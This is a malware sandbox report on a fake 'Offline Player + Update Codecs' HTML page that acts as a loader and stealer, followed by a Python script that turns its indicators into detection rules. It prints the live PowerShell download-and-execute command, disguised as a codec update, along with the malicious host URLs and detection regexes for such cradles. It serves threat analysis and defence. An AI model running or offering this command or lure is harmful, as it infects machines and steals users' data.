File name:

Offline Player + Update Codecs.html

Full analysis: https://app.any.run/tasks/4300d4df-5d18-4e3b-a6a6-985880f761b7
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 08, 2025, 17:40:21
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
stealer
arch-scr
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with CRLF line terminators
MD5:

DA46AE7BAC64B71126973D8069D19FBD

SHA1:

439C28B6E802A04961A90260B75599923B11824D

SHA256:

A76924CDC8996C80C2352700767172720A12890466AE2A0DB850CF9FA6EF5724

SSDEEP:

12:hPEhk4NLfTU7fMStWwJL2IjDRRFERoMWPGu:hPGN6EStFScRR+oMK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Probably downloads file via BitsAdmin (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
    • Gets TEMP folder path (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
    • Uses sleep, probably to evade detection (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 1764)
      • wscript.exe (PID: 744)
    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 2800)
    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
    • Actions look like stealing of personal data

      • wscript.exe (PID: 2800)
  • SUSPICIOUS

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
    • Application launched itself

      • powershell.exe (PID: 780)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 780)
    • Probably downloads files using WebClient

      • powershell.exe (PID: 780)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 780)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
    • Likely accesses (executes) a file from the Public directory

      • ntdlg.exe (PID: 1012)
      • wscript.exe (PID: 2800)
      • ntdlg.exe (PID: 5204)
      • wscript.exe (PID: 7172)
      • notepad++.exe (PID: 4620)
      • wscript.exe (PID: 7360)
      • ntdlg.exe (PID: 1056)
      • ntdlg.exe (PID: 7972)
      • ntdlg.exe (PID: 5188)
      • ntdlg.exe (PID: 7104)
      • ntdlg.exe (PID: 6468)
      • notepad.exe (PID: 7372)
      • ntdlg.exe (PID: 2780)
      • ntdlg.exe (PID: 7804)
      • ntdlg.exe (PID: 1812)
      • wscript.exe (PID: 4304)
      • ntdlg.exe (PID: 1128)
      • wscript.exe (PID: 4696)
      • ntdlg.exe (PID: 7400)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
      • ntdlg.exe (PID: 4380)
      • ntdlg.exe (PID: 6004)
      • ntdlg.exe (PID: 2692)
      • ntdlg.exe (PID: 5212)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 4188)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4188)
    • The process executes JS scripts

      • powershell.exe (PID: 4188)
    • Connects to unusual port

      • ntdlg.exe (PID: 1012)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
    • Checks whether a specific file exists (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 2800)
    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
    • Creates file in the systems drive root

      • wscript.exe (PID: 2800)
    • Accesses current user name via WMI (SCRIPT)

      • wscript.exe (PID: 2800)
  • INFO

    • Reads the computer name

      • identity_helper.exe (PID: 1628)
      • ntdlg.exe (PID: 1012)
    • Checks supported languages

      • identity_helper.exe (PID: 1628)
      • ntdlg.exe (PID: 1012)
      • curl.exe (PID: 6808)
      • ntdlg.exe (PID: 5204)
      • ntdlg.exe (PID: 1056)
      • ntdlg.exe (PID: 7972)
      • ntdlg.exe (PID: 5188)
      • curl.exe (PID: 6436)
      • ntdlg.exe (PID: 7104)
      • curl.exe (PID: 3976)
      • ntdlg.exe (PID: 6468)
      • ntdlg.exe (PID: 2780)
      • ntdlg.exe (PID: 1812)
      • ntdlg.exe (PID: 7804)
      • ntdlg.exe (PID: 1128)
      • ntdlg.exe (PID: 7400)
      • ntdlg.exe (PID: 2692)
      • ntdlg.exe (PID: 4380)
      • ntdlg.exe (PID: 6004)
      • ntdlg.exe (PID: 5212)
      • curl.exe (PID: 5488)
      • curl.exe (PID: 5972)
      • curl.exe (PID: 6480)
      • curl.exe (PID: 6572)
    • Manual execution by a user

      • powershell.exe (PID: 780)
      • ntdlg.exe (PID: 5204)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • ntdlg.exe (PID: 5188)
      • notepad++.exe (PID: 4620)
      • ntdlg.exe (PID: 7104)
      • ntdlg.exe (PID: 6468)
      • Taskmgr.exe (PID: 5256)
      • Taskmgr.exe (PID: 7156)
      • ntdlg.exe (PID: 1812)
      • ntdlg.exe (PID: 7804)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • ntdlg.exe (PID: 2780)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
      • ntdlg.exe (PID: 2692)
      • ntdlg.exe (PID: 5212)
    • Application launched itself

      • msedge.exe (PID: 7436)
    • Disables trace logs

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
    • Reads Environment values

      • identity_helper.exe (PID: 1628)
    • Checks proxy server information

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
      • slui.exe (PID: 1128)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 780)
      • powershell.exe (PID: 4188)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4188)
    • Reads the machine GUID from the registry

      • ntdlg.exe (PID: 1012)
      • ntdlg.exe (PID: 1056)
      • ntdlg.exe (PID: 7972)
      • ntdlg.exe (PID: 5204)
      • ntdlg.exe (PID: 5188)
      • ntdlg.exe (PID: 6468)
      • ntdlg.exe (PID: 7104)
      • ntdlg.exe (PID: 2780)
      • ntdlg.exe (PID: 1812)
      • ntdlg.exe (PID: 7804)
      • ntdlg.exe (PID: 1128)
      • ntdlg.exe (PID: 7400)
      • ntdlg.exe (PID: 4380)
      • ntdlg.exe (PID: 6004)
      • ntdlg.exe (PID: 2692)
      • ntdlg.exe (PID: 5212)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4188)
    • Execution of CURL command

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
    • Creates files or folders in the user directory

      • ntdlg.exe (PID: 1012)
    • Creates files in a temporary directory

      • curl.exe (PID: 6808)
      • curl.exe (PID: 6436)
      • curl.exe (PID: 3976)
      • curl.exe (PID: 6572)
    • Reads Internet Explorer settings

      • wscript.exe (PID: 2800)
      • wscript.exe (PID: 7360)
      • wscript.exe (PID: 7172)
      • wscript.exe (PID: 4304)
      • wscript.exe (PID: 4696)
      • wscript.exe (PID: 744)
      • wscript.exe (PID: 1764)
    • Reads the software policy settings

      • slui.exe (PID: 7660)
      • slui.exe (PID: 1128)
    • Executable content was dropped or overwritten

      • msedge.exe (PID: 3176)
    • The sample was compiled with English language support

      • msedge.exe (PID: 3176)
    • Reads security settings of Internet Explorer

      • Taskmgr.exe (PID: 7156)
      • OpenWith.exe (PID: 6564)
      • notepad.exe (PID: 7372)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 6564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)

EXIF

HTML

Title: Offline X-MPEG Player
No data.
All screenshots are available in the full report
Total processes
247
Monitored processes
107
Malicious processes
9
Suspicious processes
0

Behavior graph

start msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs sppextcomobj.exe no specs slui.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs wscript.exe ntdlg.exe conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs curl.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs slui.exe rundll32.exe no specs msedge.exe no specs ntdlg.exe no specs conhost.exe no specs notepad++.exe no specs msedge.exe no specs msedge.exe wscript.exe no specs ntdlg.exe no specs conhost.exe no specs wscript.exe no specs ntdlg.exe no specs conhost.exe no specs ntdlg.exe no specs conhost.exe no specs msedge.exe no specs curl.exe no specs conhost.exe no specs ntdlg.exe curl.exe no specs conhost.exe no specs conhost.exe no specs ntdlg.exe conhost.exe no specs taskmgr.exe no specs taskmgr.exe msedge.exe no specs openwith.exe no specs notepad.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs ntdlg.exe no specs conhost.exe no specs ntdlg.exe no specs conhost.exe no specs msedge.exe no specs ntdlg.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs wscript.exe no specs ntdlg.exe no specs conhost.exe no specs wscript.exe no specs ntdlg.exe no specs conhost.exe no specs wscript.exe no specs wscript.exe no specs ntdlg.exe no specs conhost.exe no specs ntdlg.exe no specs conhost.exe no specs ntdlg.exe no specs conhost.exe no specs msedge.exe no specs ntdlg.exe no specs conhost.exe no specs curl.exe no specs conhost.exe no specs curl.exe no specs conhost.exe no specs msedge.exe no specs 
curl.exe no specs conhost.exe no specs curl.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
PID:
744
CMD:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Controller\ntdlg.js"
Path:
C:\Windows\System32\wscript.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
780
CMD:
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://turistojoy43-001-site1.atempurl.com/system_t01.js')" # Download XMPEG-Codec 0.2.33 AUTOUpdate
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
856
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
ntdlg.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1012
CMD:
"C:\Users\Public\Controller\ntdlg.exe"
Path:
C:\Users\Public\Controller\ntdlg.exe
Parent process:
wscript.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\public\controller\ntdlg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
PID:
1056
CMD:
"C:\Users\Public\Controller\ntdlg.exe"
Path:
C:\Users\Public\Controller\ntdlg.exe
Parent process:
wscript.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\public\controller\ntdlg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
PID:
1128
CMD:
C:\WINDOWS\System32\slui.exe -Embedding
Path:
C:\Windows\System32\slui.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID:
1128
CMD:
"C:\Users\Public\Controller\ntdlg.exe"
Path:
C:\Users\Public\Controller\ntdlg.exe
Parent process:
wscript.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\public\controller\ntdlg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
PID:
1188
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5692 --field-trial-handle=2364,i,18262556210716992653,65211040996942764,262144 --variations-seed-version /prefetch:8
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1244
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6372 --field-trial-handle=2364,i,18262556210716992653,65211040996942764,262144 --variations-seed-version /prefetch:8
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1272
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5228 --field-trial-handle=2364,i,18262556210716992653,65211040996942764,262144 --variations-seed-version /prefetch:8
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
40 050
Read events
40 024
Write events
25
Delete events
1

Modification events

(PID) Process: (7436) msedge.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation: write
Name: S-1-5-21-1693682860-607145093-2874071422-1001
Value: 6E13AB21DE902F00

(PID) Process: (7436) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\525034
Operation: write
Name: WindowTabManagerFileMappingId
Value: {2F624D8E-4987-4622-9096-CCD3BF0808D7}

(PID) Process: (7436) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation: write
Name: failed_count
Value: 0

(PID) Process: (7436) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation: write
Name: state
Value: 2

(PID) Process: (7436) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation: write
Name: state
Value: 1

(PID) Process: (7436) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation: write
Name: user_experience_metrics.stability.exited_cleanly
Value: 0

(PID) Process: (7436) msedge.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation: write
Name: S-1-5-21-1693682860-607145093-2874071422-1001
Value: D2BFA221DE902F00

(PID) Process: (7436) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\525034
Operation: write
Name: WindowTabManagerFileMappingId
Value: {BF59393B-61CE-4A20-8963-FC59DAAB0232}

(PID) Process: (7436) msedge.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation: write
Name: S-1-5-21-1693682860-607145093-2874071422-1001
Value: 368C0322DE902F00

(PID) Process: (7436) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: MicrosoftEdgeAutoLaunch_29EBC4579851B72EE312C449CF839B1A
Value: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
Executable files
36
Suspicious files
753
Text files
161
Unknown types
0

Dropped files

PID | Process | Filename
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF10b7c9.TMP
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF10b7c9.TMP
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF10b7c9.TMP
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF10b7d8.TMP
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF10b7f7.TMP
7436 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5 and SHA256 are blank for every entry above.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
49
TCP/UDP connections
89
DNS requests
92
Threats
13

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | Type / Reputation (as extracted; the CN and Size columns are empty)
7748 | msedge.exe | GET | 200 | 45.58.159.53:80 | http://turistojoy43-001-site1.atempurl.com/player/loader.php | unknown
- | - | GET | 200 | 2.22.242.90:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown, whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown, whitelisted
2924 | SearchApp.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown, whitelisted
2924 | SearchApp.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown, whitelisted
780 | powershell.exe | GET | 200 | 45.58.159.53:80 | http://turistojoy43-001-site1.atempurl.com/system_t01.js | unknown
5072 | svchost.exe | HEAD | 200 | 45.58.159.53:80 | http://turistojoy43-001-site1.atempurl.com/ntdlg_t01.zip | unknown
4188 | powershell.exe | GET | 200 | 45.58.159.53:80 | http://turistojoy43-001-site1.atempurl.com/system_t01.js | unknown
5332 | SIHClient.exe | GET | 200 | 23.52.120.96:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown, whitelisted
5072 | svchost.exe | GET | 200 | 45.58.159.53:80 | http://turistojoy43-001-site1.atempurl.com/ntdlg_t01.zip | unknown
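The process and HTTP rows above carry the whole story of this sample in a handful of fields: a PowerShell one-liner launched from explorer.exe that pulls system_t01.js with Invoke-Expression + DownloadString, a trailing "# Download XMPEG-Codec 0.2.33 AUTOUpdate" comment that is the only part a victim reads when pasting the command (the "Manual execution by a user" indicator on PID 780 fits a copy-and-paste lure), wscript.exe running ntdlg.js out of C:\Users\Public\Controller, that script spawning ntdlg.exe (one instance at HIGH integrity), and svchost.exe issuing a HEAD and then a GET for ntdlg_t01.zip, which is the access pattern of a BITS job and is consistent with the "Probably downloads file via BitsAdmin" signature. The script below is an added example, not ANY.RUN code: it transcribes a subset of those rows inline (command lines verbatim from the report) and re-derives each of those verdicts as a rule, so the same checks can be run over process-creation and proxy logs from a real host. The rule names and the dataclass layout are this example's own.

```python
"""Re-derive the report's key verdicts from its own process and HTTP rows.

Added example (not ANY.RUN code). PROCS and HTTP are transcribed from the
"Process information" and "HTTP requests" sections of the report; the rule
names are labels chosen here to mirror the sandbox signatures they correspond to.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str       # executable path, as listed under "Path"
    cmdline: str     # as listed under "CMD"
    parent: str      # parent image name
    integrity: str = "MEDIUM"


@dataclass(frozen=True)
class Http:
    pid: int
    process: str
    method: str
    url: str


# Transcribed from the report (subset of processes; command lines verbatim).
PROCS = [
    Proc(780, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'''"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://turistojoy43-001-site1.atempurl.com/system_t01.js')" # Download XMPEG-Codec 0.2.33 AUTOUpdate''',
         "explorer.exe"),
    Proc(744, r"C:\Windows\System32\wscript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\Public\Controller\ntdlg.js"',
         "explorer.exe"),
    Proc(1012, r"C:\Users\Public\Controller\ntdlg.exe",
         r'"C:\Users\Public\Controller\ntdlg.exe"', "wscript.exe", integrity="HIGH"),
    Proc(1128, r"C:\Windows\System32\slui.exe",
         r"C:\WINDOWS\System32\slui.exe -Embedding", "svchost.exe"),
]

HOST = "http://turistojoy43-001-site1.atempurl.com"
HTTP = [
    Http(7748, "msedge.exe", "GET", HOST + "/player/loader.php"),
    Http(780, "powershell.exe", "GET", HOST + "/system_t01.js"),
    Http(5072, "svchost.exe", "HEAD", HOST + "/ntdlg_t01.zip"),
    Http(4188, "powershell.exe", "GET", HOST + "/system_t01.js"),
    Http(5072, "svchost.exe", "GET", HOST + "/ntdlg_t01.zip"),
]

# IEX and DownloadString in either order: the in-memory download cradle.
CRADLE = re.compile(r"(invoke-expression|\biex\b).*downloadstring"
                    r"|downloadstring.*(invoke-expression|\biex\b)", re.I)
# A '# ...' after the closing quote of -Command: the text a pasting user sees.
TRAILING_COMMENT = re.compile(r'"\s+#\s*\S')
PUBLIC_DIR = re.compile(r"\\users\\public\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_EXT = (".js", ".vbs", ".ps1", ".hta", ".txt")


def triage_processes(procs):
    """Return (rule, pid) pairs for process-level indicators."""
    hits = []
    for p in procs:
        image = p.image.rsplit("\\", 1)[-1].lower()
        if image == "powershell.exe" and CRADLE.search(p.cmdline):
            hits.append(("ps_download_cradle", p.pid))
            if TRAILING_COMMENT.search(p.cmdline):
                hits.append(("pasted_command_lure", p.pid))
        if PUBLIC_DIR.search(p.cmdline):
            hits.append(("exec_from_public_dir", p.pid))
            if p.integrity.upper() == "HIGH":
                hits.append(("high_integrity_from_public_dir", p.pid))
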